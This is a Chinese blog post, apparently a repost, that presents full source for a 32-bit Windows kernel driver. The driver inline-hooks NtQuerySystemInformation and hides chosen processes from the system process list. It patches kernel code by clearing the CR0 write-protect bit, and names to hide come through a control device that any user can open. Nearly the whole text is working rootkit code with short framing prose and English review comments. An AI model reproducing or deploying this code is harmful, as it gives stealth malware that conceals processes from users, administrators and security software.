

内核层 inlinehook 隐藏进程

發(fā)布時間:2024/4/11 编程问答 31 豆豆
生活随笔 收集整理的這篇文章主要介紹了 内核层 inlinehook 隐藏进程 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

上次是 SSDT HOOK 方式隱藏進程,如鏈接:http://blog.csdn.net/hjxyshell/article/details/16993119

這次是 InlineHook 方式隱藏進程,這里 inline hook 的原理就不做詳細介紹了,網上相關資源較多,擼主主要參考看雪的某大牛的“詳談內核三步走 Inline Hook 實現”(http://bbs.pediy.com/showthread.php?t=98493)

中間有一些關于進程枚舉的處理,上次寫了個簡單的代碼:http://blog.csdn.net/hjxyshell/article/details/17312119


代碼如下:


?

  • #include?<ntddk.h>??
  • #include?<Wdmsec.h>????
  • #include?<Wdm.h>????
  • ??
  • // IOCTL code accepted by MyDispatchFunction (METHOD_BUFFERED; caller needs read+write access).
  • #define?MY_DVC_IN_CODE?\??
  • ????????(ULONG)CTL_CODE(FILE_DEVICE_UNKNOWN,\??
  • ????????????????0xa02,\??
  • ????????????????METHOD_BUFFERED,\??
  • ????????????????FILE_READ_DATA|FILE_WRITE_DATA)??
  • ??
  • // Singly linked list of process names that MyNtQuerySystemInformation filters out.
  • // pProcNameHeader is a sentinel node allocated in DriverEntry; real entries start at
  • // pProcNameHeader->pNext. The list is read and modified without any lock.
  • typedef?struct?_ProcNameLink????
  • {????
  • ????UNICODE_STRING?ProcName;????// name to hide; Buffer is its own NonPagedPool allocation (see AddProcToLink)
  • ????struct?_ProcNameLink?*pNext;????
  • }ProcNameLink,*pProcNameLink;??
  • ??
  • pProcNameLink?pProcNameHeader;??// list head (sentinel)
  • pProcNameLink?pProcNameTail;???// last node, kept for O(1) append
  • // Byte type used for raw code patching.
  • typedef?unsigned?char?BYTE;??
  • ULONG??CR0VALUE;???????????????????????// CR0 as read before clearing the WP bit; restored afterwards
  • BYTE??OriginalBytes[5]={0};?????????????// first 5 bytes of NtQuerySystemInformation, saved so UnHook can restore them
  • BYTE?JmpAddress[5]={0xE9,0,0,0,0};???????// 5-byte relative JMP (E9 rel32); rel32 is filled in by HookNtQuerySystemInformation
  • ??
  • // Per-thread record that follows each _SYSTEM_PROCESSES entry (undocumented layout,
  • // presumably the 32-bit SYSTEM_THREAD_INFORMATION; only used here to size the trailing array).
  • struct?_SYSTEM_THREADS????
  • {????
  • ????????LARGE_INTEGER???????????KernelTime;????
  • ????????LARGE_INTEGER???????????UserTime;????
  • ????????LARGE_INTEGER???????????CreateTime;????
  • ????????ULONG???????????????????????????WaitTime;????
  • ????????PVOID???????????????????????????StartAddress;????
  • ????????CLIENT_ID???????????????????????ClientIs;????
  • ????????KPRIORITY???????????????????????Priority;????
  • ????????KPRIORITY???????????????????????BasePriority;????
  • ????????ULONG???????????????????????????ContextSwitchCount;????
  • ????????ULONG???????????????????????????ThreadState;????
  • ????????KWAIT_REASON????????????WaitReason;????
  • };????
  • // One entry of the buffer returned for SystemInformationClass 5 (process list).
  • // Entries are chained by NextEntryDelta: byte offset from this entry to the next one,
  • // 0 on the last entry. MyNtQuerySystemInformation unlinks an entry by rewriting the
  • // previous entry's NextEntryDelta.
  • struct?_SYSTEM_PROCESSES????
  • {????
  • ????????ULONG???????????????????????????NextEntryDelta;????
  • ????????ULONG???????????????????????????ThreadCount;????
  • ????????ULONG???????????????????????????Reserved[6];????
  • ????????LARGE_INTEGER???????????????????CreateTime;????
  • ????????LARGE_INTEGER???????????????????UserTime;????
  • ????????LARGE_INTEGER???????????????????KernelTime;????
  • ????????UNICODE_STRING??????????????????ProcessName;????// image name; compared against the hide list
  • ????????KPRIORITY???????????????????????BasePriority;????
  • ????????ULONG???????????????????????????ProcessId;????
  • ????????ULONG???????????????????????????InheritedFromProcessId;????
  • ????????ULONG???????????????????????????HandleCount;????
  • ????????ULONG???????????????????????????Reserved2[2];????
  • ????????VM_COUNTERS?????????????????????VmCounters;????
  • ????????IO_COUNTERS?????????????????????IoCounters;?// windows 2000 only (author's note)
  • ????????struct?_SYSTEM_THREADS??????????Threads[1];????// variable-length; ThreadCount records follow
  • };????
  • ??
  • // Kernel export being hooked: returns system / process information for the given class.
  • // Its first 5 bytes are overwritten by HookNtQuerySystemInformation.
  • NTSYSAPI????
  • NTSTATUS????
  • NTAPI?NtQuerySystemInformation(????
  • ????????????????????????IN?ULONG?SystemInformationClass,????
  • ????????????????????????OUT?PVOID?SystemInformation,????
  • ????????????????????????IN?ULONG?SystemInformationLength,????
  • ????????????????????????OUT?PULONG?ReturnLength????
  • ????????????????????????????);??
  • // Replacement that the JMP lands in; same signature as the export (defined below).
  • // NOTE(review): declared without NTAPI, so the calling convention relies on the
  • // project's default matching the export's (stdcall) — confirm in the build settings.
  • NTSTATUS??
  • MyNtQuerySystemInformation(??
  • ????????????????????????IN?ULONG?SystemInformationClass,??
  • ????????????????????????OUT?PVOID?SystemInformation,??
  • ????????????????????????IN?ULONG?SystemInformationLength,??
  • ????????????????????????OUT?PULONG?ReturnLength??
  • ????????????????????????????);??
  • ??
  • // Installs the inline hook: saves the first 5 bytes of NtQuerySystemInformation into
  • // OriginalBytes, then overwrites them with a relative JMP (E9 rel32) to
  • // MyNtQuerySystemInformation. No parameters, no return value; writes the file-scope
  • // globals OriginalBytes, JmpAddress and CR0VALUE.
  • // x86 (32-bit) MSVC inline assembly; the (ULONG) casts on function pointers assume 32-bit addresses.
  • // NOTE(review): the patch sits in the exported function's prologue, so any comparison of the
  • // in-memory kernel text against the on-disk image reveals it.
  • void?HookNtQuerySystemInformation(??
  • ????????????????????//??IN?ULONG?SystemInformationClass,??
  • ????????????????????//??OUT?PVOID?SystemInfotmation,??
  • ????????????????????//??IN?ULONOG?SystemInformatonLength,??
  • ????????????????????//??OUT?PULONG?ReturnLength??
  • ????????????????????????????????)??
  • {??
  • ????// fill the two 5-byte arrays declared at file scope
  • ????KIRQL?Irql;??
  • ????DbgPrint("[NtQuerySystemInformation]:?0x%x",NtQuerySystemInformation);??
  • ????// save the original first 5 bytes so UnHookNtQuerySystemInformation can restore them
  • ????RtlCopyMemory(OriginalBytes,(BYTE*)NtQuerySystemInformation,5);??
  • ????// rel32 of the JMP: target minus the address of the instruction that follows the 5-byte JMP
  • ????*(ULONG*)(JmpAddress?+?1)?=?(ULONG)MyNtQuerySystemInformation?-?((ULONG)NtQuerySystemInformation+5);??
  • ????// copy the JMP over the first 5 bytes of the original function
  • ????// clear CR0.WP (bit 16) so that read-only kernel code pages can be written
  • ????__asm??
  • ????{??
  • ????// only eax is used, so only eax is preserved
  • ????push?eax??
  • ????mov?eax,cr0??
  • ????mov?CR0VALUE,eax??
  • ????and?eax,0fffeffffh??
  • ????mov?cr0,eax??
  • ????pop?eax??
  • ????}??
  • ????// raise to DISPATCH_LEVEL for the duration of the write (author's intent: avoid being interrupted mid-write)
  • ????Irql?=?KeRaiseIrqlToDpcLevel();??
  • ????// write the 5-byte JMP
  • ????RtlCopyMemory((BYTE*)NtQuerySystemInformation,JmpAddress,5);??
  • ????// back to the previous IRQL
  • ????KeLowerIrql(Irql);??
  • ????// restore CR0 (re-enables write protection)
  • ????__asm??
  • ????{??
  • ????push?eax??
  • ????mov?eax,CR0VALUE??
  • ????mov?cr0,eax??
  • ????pop?eax??
  • ????}??
  • ??????
  • }??
  • // Removes the inline hook by writing OriginalBytes back over the first 5 bytes of
  • // NtQuerySystemInformation. Same CR0.WP / IRQL sequence as HookNtQuerySystemInformation.
  • // No parameters, no return value. Called from OnUnload.
  • void?UnHookNtQuerySystemInformation(??
  • ????????????????????//??IN?ULONG?SystemInformationClass,??
  • ????????????????????//??OUT?PVOID?SystemInfotmation,??
  • ????????????????????//??IN?ULONOG?SystemInformatonLength,??
  • ????????????????????//??OUT?PULONG?ReturnLength??
  • ????????????????????????????????)??
  • {??
  • ????// write the saved 5 bytes back into the original function
  • ????KIRQL?Irql;??
  • ????// clear CR0.WP (bit 16)
  • ????__asm??
  • ????{??
  • ????????push?eax??
  • ????????mov?eax,cr0??
  • ????????mov?CR0VALUE,eax??
  • ????????and?eax,0fffeffffh??
  • ????????mov?cr0,eax??
  • ????????pop?eax??
  • ????}??
  • ????// raise to DISPATCH_LEVEL while restoring the bytes
  • ????Irql?=?KeRaiseIrqlToDpcLevel();??
  • ????RtlCopyMemory((BYTE*)NtQuerySystemInformation,OriginalBytes,5);??
  • ????KeLowerIrql(Irql);??
  • ????// restore CR0 (re-enables write protection)
  • ????__asm??
  • ????{??
  • ????push?eax??
  • ????mov?eax,CR0VALUE??
  • ????mov?cr0,eax??
  • ????pop?eax??
  • ????}??
  • }??
  • // Trampoline used to call the un-hooked function: re-executes the instruction that the
  • // JMP overwrote, then jumps to NtQuerySystemInformation + 5. Naked, so the caller's
  • // arguments are still on the stack when control reaches the original body.
  • // NOTE(review): the overwritten prologue is hard-coded as `push 210h` rather than taken
  • // from OriginalBytes, so this only matches a kernel build whose first 5 bytes are that
  • // instruction.
  • _declspec?(naked)?NTSTATUS?OriginalNtQuerySystemInformation(??
  • ????????????????????????????????????????IN?ULONG?SystemInformationClass,??
  • ????????????????????????????????????????OUT?PVOID?SystemInfotmation,??
  • ????????????????????????????????????????IN?ULONG?SystemInformatonLength,??
  • ????????????????????????????????????????OUT?PULONG?ReturnLength??
  • ????????????????????????????????????????????????????????????)??
  • {??
  • ????__asm{??
  • ????????// eax is not an arbitrary choice: a register that still holds a live value would be
  • ????????// clobbered here. eax is about to be overwritten by the callee anyway (its old value
  • ????????// no longer matters), so it is safe to use as scratch.
  • ????????push?210h??
  • ????????mov?eax,NtQuerySystemInformation??
  • ????????add?eax,5??
  • ????????jmp?eax??
  • ????????}?????????
  • }??
  • ??
  • // Hook body. Calls the original function through the trampoline and, for
  • // SystemInformationClass 5 (process list), unlinks every entry whose ProcessName
  • // matches a name in the hide list by adjusting the previous entry's NextEntryDelta.
  • // Parameters and return value are those of NtQuerySystemInformation; ntStatus is
  • // passed through unchanged.
  • // NOTE(review): the match is memcmp over a fixed 16 bytes (8 WCHARs) of both buffers,
  • // independent of either string's Length; the hide list is walked without a lock while
  • // MyDispatchFunction may be modifying it.
  • NTSTATUS??
  • MyNtQuerySystemInformation(??
  • ????????????????????????IN?ULONG?SystemInformationClass,??
  • ????????????????????????OUT?PVOID?SystemInformation,??
  • ????????????????????????IN?ULONG?SystemInformationLength,??
  • ????????????????????????OUT?PULONG?ReturnLength??
  • ????????????????????????????)??
  • {??
  • ????????NTSTATUS?ntStatus;??
  • ????????pProcNameLink?pTempLink;??// cursor over the hide list
  • ????????//DbgPrint("it's?here!!!\n");??
  • ????????// let the real function fill the caller's buffer first
  • ????????ntStatus?=?OriginalNtQuerySystemInformation(??
  • ????????????????????????????????????????????SystemInformationClass,??
  • ????????????????????????????????????????????SystemInformation,??
  • ????????????????????????????????????????????SystemInformationLength,??
  • ????????????????????????????????????????????ReturnLength??
  • ????????????????????????????????????????????????????);??
  • ????????if(NT_SUCCESS(ntStatus))??
  • ????????{??
  • ????????????if(SystemInformationClass?==?5)??
  • ????????????{??
  • ????????????????// for each name in the hide list, rescan the whole process list
  • ????????????????for((pTempLink?=?pProcNameHeader->pNext)&&(pTempLink?!=?NULL);pTempLink?!=NULL;)??
  • ????????????????{??
  • ????????????????????// every pass starts again from the first process entry
  • ????????????????????struct?_SYSTEM_PROCESSES?*curr?=?(struct?_SYSTEM_PROCESSES?*)SystemInformation;??
  • ????????????????????struct?_SYSTEM_PROCESSES?*prev?=?NULL;??
  • ????????????????????while(curr)??
  • ????????????????????{??
  • ????????????????????????if(curr->ProcessName.Buffer?!=?NULL)??
  • ????????????????????????{??
  • ????????????????????????????if(0?==?memcmp(curr->ProcessName.Buffer,pTempLink->ProcName.Buffer,16))?// is this one of the names to hide?
  • ????????????????????????????{??
  • ????????????????????????????????// where in the chain does the matching entry sit?
  • ????????????????????????????????if(prev)?// middle or last entry: splice it out via prev
  • ????????????????????????????????{??
  • ????????????????????????????????????if(curr->NextEntryDelta)????
  • ????????????????????????????????????????prev->NextEntryDelta?+=?curr->NextEntryDelta;????
  • ????????????????????????????????????else????// it was the last entry
  • ????????????????????????????????????????prev->NextEntryDelta?=?0;????
  • ????????????????????????????????}??
  • ????????????????????????????????else????
  • ????????????????????????????????{????
  • ????????????????????????????????????if(curr->NextEntryDelta)????
  • ????????????????????????????????????{????
  • ????????????????????????????????????????// matching entry is the first one: advance the local SystemInformation pointer
  • ????????????????????????????????????????(char?*)SystemInformation?+=?curr->NextEntryDelta;????
  • ????????????????????????????????????}????
  • ????????????????????????????????????else?// it is the only entry
  • ????????????????????????????????????????SystemInformation?=?NULL;????
  • ????????????????????????????????}????
  • ????????????????????????????}??
  • ????????????????????????}??
  • ????????????????????????prev?=?curr;????
  • ????????????????????????if(curr->NextEntryDelta)?????
  • ????????????????????????????(char?*)curr?+=?curr->NextEntryDelta;????
  • ????????????????????????else?????
  • ????????????????????????????curr?=?NULL;??????????????????????
  • ????????????????????}??
  • ?????????????????pTempLink?=?pTempLink->pNext;??
  • ????????????????}?????
  • ????????????}??
  • ????????}?????????????????????????????????
  • ????return?ntStatus;??
  • ????//return?1;??
  • }??
  • // Appends a copy of ProcName to the hide list (list tail pProcNameTail is updated).
  • // ProcName: caller-owned UNICODE_STRING; its contents are copied into a fresh
  • // 256-byte NonPagedPool buffer. No return value.
  • // NOTE(review): neither ExAllocatePool result is checked for NULL before use.
  • VOID?AddProcToLink(PUNICODE_STRING?ProcName)????
  • {????
  • ????// author's note: a duplicate check could go here; none is performed (duplicates do not change the result)
  • ????pProcNameLink?pNewLink?=?(pProcNameLink)ExAllocatePool(NonPagedPool,?sizeof(ProcNameLink));??// new node
  • ????(pNewLink->ProcName).Length?=?0;????
  • ????(pNewLink->ProcName).MaximumLength?=?256;????
  • ????(pNewLink->ProcName).Buffer?=?(PWCHAR)ExAllocatePool(NonPagedPool,?256);??// name storage for the new node
  • ????????
  • ????RtlCopyUnicodeString(&(pNewLink->ProcName),ProcName);??// copy (truncates to MaximumLength)
  • ????pNewLink->pNext?=?NULL;????
  • ????pProcNameTail->pNext?=?pNewLink;????
  • ????pProcNameTail?=?pNewLink;????// new list tail
  • }????
  • // Unlinks the first list entry whose ProcName equals pProcName (case-insensitive
  • // RtlCompareUnicodeString). No-op on an empty list. No return value.
  • // NOTE(review): the unlinked node and its Buffer are not freed here.
  • VOID?RmProcFromLink(PUNICODE_STRING?pProcName)????
  • {????
  • ????pProcNameLink?pNewLink?=?pProcNameHeader;????// walks one node behind the candidate
  • ????if(pProcNameHeader->pNext?==?NULL)????
  • ????????return;????
  • ????for(?pNewLink;pNewLink->pNext?!=?NULL;)????
  • ????{????
  • ????????// found: drop it from the chain
  • ????????if(RtlCompareUnicodeString(&(pNewLink->pNext->ProcName),pProcName,TRUE)==0)????
  • ????????{????
  • ????????????pNewLink->pNext?=?pNewLink->pNext->pNext;????
  • ????????????if(pNewLink->pNext?==?NULL)??// removed the last node: move the tail pointer back
  • ????????????????pProcNameTail?=?pNewLink;????
  • ????????????break;????
  • ????????}????
  • ????????pNewLink?=?pNewLink->pNext;??// kept out of the for header to make breakpoints easier (author's note)
  • ????}????
  • ????
  • }????
  • // Driver unload: restores NtQuerySystemInformation, then deletes the symbolic link
  • // and the device object created in DriverEntry.
  • // NOTE(review): the hide list (sentinel, nodes and name buffers) is not released here.
  • VOID?OnUnload(IN?PDRIVER_OBJECT?driver)????
  • {????
  • ????UNICODE_STRING?symblink_name;??// C requires declarations first
  • ????DbgPrint("ROOTKIT:?OnUnload?called\n");????
  • ???//?unhook?ZwQuerySystemInformation????
  • ????UnHookNtQuerySystemInformation();??
  • ??????
  • ????if(IoIsWdmVersionAvailable(1,0x10))????
  • ????{????
  • ????????// WDM 1.0x available: the link was created under \DosDevices\Global
  • ????????RtlInitUnicodeString(&symblink_name,L"\\DosDevices\\Global\\testSL");???????????
  • ????}????
  • ????else????
  • ????{????
  • ????????// otherwise it was created under \DosDevices
  • ????????RtlInitUnicodeString(&symblink_name,L"\\DosDevices\\testSL");????
  • ????}????
  • ????IoDeleteSymbolicLink(&symblink_name?);????
  • ????IoDeleteDevice(driver->DeviceObject);????
  • ????DbgPrint("our?driver?is?unloading?...?\r\n");????
  • }????
  • // Single dispatch routine registered for every major function in DriverEntry.
  • // CREATE/CLOSE complete with STATUS_SUCCESS. DEVICE_CONTROL reads the METHOD_BUFFERED
  • // system buffer as an ANSI process name: a leading '-' means remove from the hide
  • // list, anything else means add; the name is the remaining in_len-1 bytes.
  • // Returns the status the IRP was completed with (STATUS_INVALID_PARAMETER for
  • // unhandled major functions, which are not completed here).
  • // NOTE(review): in_len is never validated — buffer[0] is read and (USHORT)(in_len - 1)
  • // computed even for in_len == 0, and the add/remove happens before the control code is
  • // compared with MY_DVC_IN_CODE. unicodeBuffer is allocated by
  • // RtlAnsiStringToUnicodeString(..., TRUE) and not released with RtlFreeUnicodeString.
  • NTSTATUS?MyDispatchFunction(PDEVICE_OBJECT?device,?PIRP?irp)????
  • {????
  • ????CHAR?inBuffer[256];????// zeroed below; the copy into it is commented out
  • ????short?flag?=?1;??// 1 = add to hide list, 0 = remove
  • ????ANSI_STRING?ansiBuffer;????
  • ????UNICODE_STRING?unicodeBuffer;????
  • ????int?i;????// unused
  • ????// current IRP stack location
  • ????PIO_STACK_LOCATION?irpsp?=?IoGetCurrentIrpStackLocation(irp);????
  • ????NTSTATUS?status?=?STATUS_INVALID_PARAMETER;????
  • ????memset(inBuffer,0,256);????
  • ????// handle each request type
  • ????switch(irpsp->MajorFunction)????
  • ????{????
  • ????????case?IRP_MJ_CREATE:????
  • ????????{????
  • ????????????// plain "complete with success" sequence
  • ????????????irp->IoStatus.Information?=?0;????
  • ????????????irp->IoStatus.Status?=?STATUS_SUCCESS;????
  • ????????????IoCompleteRequest(irp,IO_NO_INCREMENT);????
  • ????????????// debug trace when user mode opens the device
  • ????????????DbgPrint("congratulations?gay,open?device");????
  • ????????????status?=?irp->IoStatus.Status;????
  • ????????????break;????
  • ????????}????
  • ????????case?IRP_MJ_CLOSE:????
  • ????????{????
  • ????????????irp->IoStatus.Information?=?0;????
  • ????????????irp->IoStatus.Status?=?STATUS_SUCCESS;????
  • ????????????IoCompleteRequest(irp,IO_NO_INCREMENT);????
  • ????????????// debug trace when user mode closes the device
  • ????????????DbgPrint("congratulations?gay,close?device");????
  • ????????????status?=?irp->IoStatus.Status;????
  • ????????????break;????
  • ????????}????
  • ????????case?IRP_MJ_DEVICE_CONTROL:????
  • ????????{????
  • ????????????// control code
  • ????????????ULONG?code?=?irpsp->Parameters.DeviceIoControl.IoControlCode;????
  • ????????????// input / output buffer lengths (out_len is unused)
  • ????????????ULONG?in_len?=?irpsp->Parameters.DeviceIoControl.InputBufferLength;????
  • ????????????ULONG?out_len?=?irpsp->Parameters.DeviceIoControl.OutputBufferLength;????
  • ????????????// METHOD_BUFFERED: input and output share the system buffer
  • ????????????PCHAR?buffer?=?(PCHAR)irp->AssociatedIrp.SystemBuffer;????
  • ????????????//memcpy(inBuffer,buffer,in_len);????
  • ????????????// convert the ANSI name (after the optional '-') to UNICODE
  • ????????????if(buffer[0]?==?'-')????
  • ????????????????flag?=?0;????
  • ????????????ansiBuffer.Buffer?=?buffer+1;????
  • ????????????ansiBuffer.Length?=?ansiBuffer.MaximumLength?=?(USHORT)(in_len?-1);????
  • ????????????RtlAnsiStringToUnicodeString(&unicodeBuffer,?&ansiBuffer,TRUE);????
  • ????????????if(flag)????
  • ????????????????AddProcToLink(&unicodeBuffer);???// add the name to the hide list
  • ????????????else????
  • ????????????????RmProcFromLink(&unicodeBuffer);????
  • ????????????// NOTE(review): the leading '%' in this format string looks unintended ("%a...")
  • ????????????DbgPrint("%ansiBuffer?=?%Z\n",&ansiBuffer);????// %Z prints an ANSI_STRING
  • ????????????DbgPrint("unicodeBuffer?=?%wZ\n",&unicodeBuffer);????
  • ????????????if(code?==?MY_DVC_IN_CODE)????
  • ????????????{????
  • ????????????????DbgPrint("in_buffer_len?=?%d",in_len);????
  • ????????????????DbgPrint("%s",buffer);????
  • ????????????????// nothing is returned to the caller; the output buffer is unused
  • ????????????????irp->IoStatus.Information?=?0;????
  • ????????????????irp->IoStatus.Status?=?STATUS_SUCCESS;????
  • ????????????}????
  • ????????????else????
  • ????????????{????
  • ????????????????// unknown control code: complete with an error
  • ????????????????// (note the difference between completing with error and with success)
  • ????????????????irp->IoStatus.Information?=?0;????
  • ????????????????irp->IoStatus.Status?=?STATUS_INVALID_PARAMETER;????
  • ????????????}????
  • ????????????IoCompleteRequest(irp,IO_NO_INCREMENT);????
  • ????????????status?=?irp->IoStatus.Status;????
  • ????????????break;????
  • ????????}????
  • ????????case?IRP_MJ_READ:????
  • ????????{????
  • ????????????break;????// not completed here
  • ????????}????
  • ????????default:????
  • ????????{????
  • ????????????DbgPrint("unknow?request!!!");????
  • ????????????break;????
  • ????????}????
  • ????}????
  • ???????
  • ????return?status;????
  • }????
  • // Driver entry point: allocates the hide-list sentinel, creates the control device
  • // \Device\test with a symbolic link testSL, registers MyDispatchFunction for every
  • // major function plus OnUnload, then installs the inline hook.
  • // driver: driver object; reg_path: registry path (unused). Returns STATUS_SUCCESS,
  • // or the failing IoCreateDeviceSecure / IoCreateSymbolicLink status.
  • // NOTE(review): the pProcNameHeader allocation is not NULL-checked, and on
  • // IoCreateSymbolicLink failure the device created just before is not deleted.
  • NTSTATUS?DriverEntry(IN?PDRIVER_OBJECT?driver,?????
  • ?????????????????????IN?PUNICODE_STRING?reg_path)???
  • {??
  • ????ULONG?i;????
  • ????NTSTATUS?status;????
  • ????PDEVICE_OBJECT?device;????
  • ????// device name
  • ????UNICODE_STRING?device_name?=?RTL_CONSTANT_STRING(L"\\Device\\test");????
  • ????// symbolic link name
  • ????UNICODE_STRING?symblink_name;????
  • ????// arbitrary class GUID for the secure device (author's note)
  • ????static?const?GUID?MYGUID_CLASS_MYCDO?=?????
  • ????{?0x63542127,?0xfbbb,?0x49c8,?{?0x8b,?0xf4,?0x8b,?0x7c,?0xb5,?0xef,?0xd3,?0x9e?}?};????
  • //static?const?GUID?DECLSPEC_SELECTANY?MYGUID_CLASS_MYCDO?=?????
  • //{?0x8524767,?0x32fe,?0x4d86,?{?0x9f,?0x48,?0xa0,?0x26,?0x94,?0xec,?0x71,?0x42?}?};????
  • ???????
  • ????// SDDL: one ACE granting GA (GENERIC_ALL) to WD (Everyone) — any user can open and control the device
  • ????UNICODE_STRING?sdd1=RTL_CONSTANT_STRING(L"D:P(A;;GA;;;WD)");????
  • ????// hide list: allocate the sentinel node; list starts empty
  • ????pProcNameHeader?=(pProcNameLink)ExAllocatePool(NonPagedPool,?sizeof(ProcNameLink));????
  • ????pProcNameHeader->pNext?=?NULL;????
  • ????pProcNameTail?=?pProcNameHeader;????
  • ????//RtlInitUnicodeString(&(pProcNameHeader->ProcName),L"");????
  • ????//_asm?int?3????
  • ????// create the control device
  • ????status?=?IoCreateDeviceSecure(????
  • ????????????????????????????driver,????
  • ????????????????????????????0,????
  • ????????????????????????????&device_name,????
  • ????????????????????????????FILE_DEVICE_UNKNOWN,????
  • ????????????????????????????FILE_DEVICE_SECURE_OPEN,????
  • ????????????????????????????FALSE,????
  • ????????????????????????????&sdd1,????
  • ????????????????????????????(LPCGUID)&MYGUID_CLASS_MYCDO,????
  • ????????????????????????????&device????
  • ????????????????????????????);????
  • ????if(!NT_SUCCESS(status))????
  • ????{????
  • ????????DbgPrint("IoCreateDeviceSecure?failed?");????
  • ????????return?status;????
  • ????}????
  • ????DbgPrint("good?job1");????
  • ????// create the symbolic link (same name selection as OnUnload)
  • ????if(IoIsWdmVersionAvailable(1,0x10))????
  • ????{????
  • ????????// WDM 1.0x available: use the global namespace \DosDevices\Global
  • ????????RtlInitUnicodeString(&symblink_name,L"\\DosDevices\\Global\\testSL");???????????
  • ????}????
  • ????else????
  • ????{????
  • ????????// otherwise fall back to \DosDevices
  • ????????RtlInitUnicodeString(&symblink_name,L"\\DosDevices\\testSL");????
  • ????}????
  • ????status?=?IoCreateSymbolicLink(&symblink_name,&device_name);????
  • ????if(!NT_SUCCESS(status))????
  • ????{????
  • ????????DbgPrint("IoCreateSymbolicLink?failed");????
  • ????????return?status;????
  • ????}????
  • ????DbgPrint("good?job2");????
  • ????// route every major function to the single dispatch routine
  • ????for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)????
  • ????{????
  • ????????driver->MajorFunction[i]?=?MyDispatchFunction;????
  • ????}????
  • ???//?save?old?system?call?locations????
  • ???//OldZwQuerySystemInformation?=(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));????
  • ?????//?Register?a?dispatch?function?for?Unload????
  • ????driver->DriverUnload??=?OnUnload;?????
  • ????????
  • ?????//?inline?hook?????
  • ????HookNtQuerySystemInformation();??
  • ??????????????????????????????????
  • ???return?STATUS_SUCCESS;??????????????
  • ???????????????????????
  • }??
  • 說明:

    _declspec (naked) NTSTATUS OriginalNtQuerySystemInformation 函數中的寄存器不是隨便使用的,正如代碼中注釋所述一樣,這里使用 eax,因為 eax 的值會被直接覆蓋,對后續程序并無影響

    如圖:

    ?

    驅動安裝運行後,再查看函數 NtQuerySystemInformation,已經被我們掌控

